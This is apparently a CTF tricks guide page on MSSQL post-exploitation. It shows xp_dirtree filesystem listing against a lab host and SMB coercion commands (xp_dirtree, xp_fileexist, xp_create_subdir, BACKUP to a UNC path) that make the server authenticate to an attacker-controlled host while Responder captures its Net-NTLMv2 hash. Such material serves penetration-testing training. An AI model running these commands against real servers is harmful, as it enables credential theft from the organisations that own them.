> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-13/database/post-exploitation-database-mssql.md).

# Mssql

## MSSQL xp\_dirtree Filesystem Discovery

Use the `xp_dirtree` extended stored procedure to list directories and files accessible to the MSSQL service account on the target machine. This requires authenticated access to the MSSQL server. The `xp_dirtree` extended stored procedure allows querying the file system from within SQL Server. The procedure has 3 arguments. The first argument specifies the path to the directory you want to list. The second argument, a boolean, is 1 if you want to list subdirectories and 0 otherwise. The third argument, also a boolean, is 1 if you want to list files and 0 otherwise.

A direct SQL execution of the procedure looks like this:

```sql
EXEC xp_dirtree 'C:\', 1, 1;
```

Execute the command using `impacket-mssqlclient` with the `-q` flag:

```bash
impacket-mssqlclient -windows-auth manager.htb/operator:'operator'@dc01.manager.htb -q "EXEC xp_dirtree 'C:\\inetpub\\wwwroot', 1, 1;"
```

Another example using `impacket-mssqlclient` targeting a specific system directory:

```bash
impacket-mssqlclient DOMAIN/USER:PASSWORD@IP -windows-auth -q "EXEC xp_dirtree 'C:\Windows\System32\spool\drivers\color',1,1"
```

The `xp_dirtree` procedure can also be used to interact with network shares, for example:

```sql
EXEC xp_dirtree '\\192.168.1.100\share';
```

This allows for potential out-of-band interaction if the server attempts to access the specified share.

***

## MSSQL xp\_dirtree SMB Coercion

Abuse the `xp_dirtree` stored procedure in MSSQL to force the server to initiate an SMB authentication attempt to an attacker-controlled machine, allowing hash capture.

On your attacker machine, start Responder to listen for SMB connections:

```bash
responder -I <interface>
```

Then, execute `xp_dirtree` via an authenticated MSSQL connection, pointing the UNC path to your attacker IP. Replace `<attacker_IP>` with your IP address.

```python
impacket-mssqlclient -windows-auth manager.htb/operator:'operator'@dc01.manager.htb -q "EXEC xp_dirtree '\\<attacker_IP>\\share';"
```

Other stored procedures or functions can also be leveraged to coerce the SQL Server to authenticate to a remote SMB share. These include `xp_fileexist`, `xp_create_subdir`, and even database backup operations.

For example, using `xp_fileexist`:

```sql
EXEC master.dbo.xp_fileexist '\\<ATTACKER_IP>\\share';
```

Using `xp_create_subdir`:

```sql
EXEC master.dbo.xp_create_subdir '\\<ATTACKER_IP>\\share';
```

Or by attempting a database backup to a UNC path:

```sql
BACKUP DATABASE master TO DISK = '\\<ATTACKER_IP>\\share\\backup.bak';
```

When these commands are executed, the SQL Server process attempts to access the specified UNC path. If the attacker's machine is listening on the network interface, Responder will capture the Net-NTLMv2 hash of the service account running the MSSQL server.
